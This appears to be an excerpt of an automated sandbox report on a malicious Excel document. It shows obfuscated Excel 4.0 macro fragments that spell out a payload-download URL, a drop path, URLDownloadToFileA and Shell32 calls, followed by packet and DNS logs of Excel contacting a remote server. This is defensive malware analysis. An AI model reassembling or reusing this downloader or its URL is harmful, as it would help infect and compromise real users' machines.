,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:06:02.567907095 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.698780060 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.698952913 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.699388027 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.829914093 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888154984 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888185978 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888209105 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888232946 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888254881 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888258934 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888276100 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888279915 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888286114 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888300896 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888308048 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888324976 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888334990 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888350010 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888351917 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888376951 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:02.888387918 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.888410091 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:02.892734051 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019260883 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019337893 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019397020 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019450903 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019454956 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019486904 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019503117 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019509077 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019560099 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019568920 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019619942 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019619942 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019670010 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019670010 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019721985 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019721985 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019769907 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019773006 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019818068 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019830942 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019881964 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019882917 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019932985 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.019933939 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019979000 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.019983053 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.020030975 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.020031929 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.020078897 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.020081997 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.020129919 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.020133018 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.020179987 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.020183086 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.020230055 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.021414995 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151037931 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151130915 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151190996 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151252031 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151314020 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151315928 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151334047 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151384115 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151417971 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151444912 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151499987 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151503086 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151504993 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151562929 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151592970 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151622057 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151678085 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151679993 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151684046 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151738882 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151772976 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151808023 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151871920 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151876926 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151878119 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151936054 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.151964903 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.151994944 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152051926 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152054071 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152057886 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152112007 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152141094 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152170897 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152226925 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152228117 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152230978 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152295113 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
Apr 12, 2021 17:06:03.152333975 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30 |
Apr 12, 2021 17:06:03.152365923 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 12, 2021 17:06:02.484072924 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 12, 2021 17:06:02.546745062 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 12, 2021 17:06:02.484072924 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 12, 2021 17:06:02.546745062 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | 64.207.186.30 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 64.207.186.30 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 12, 2021 17:06:02.699388027 CEST | 0 | OUT | |
Apr 12, 2021 17:06:02.888154984 CEST | 2 | IN |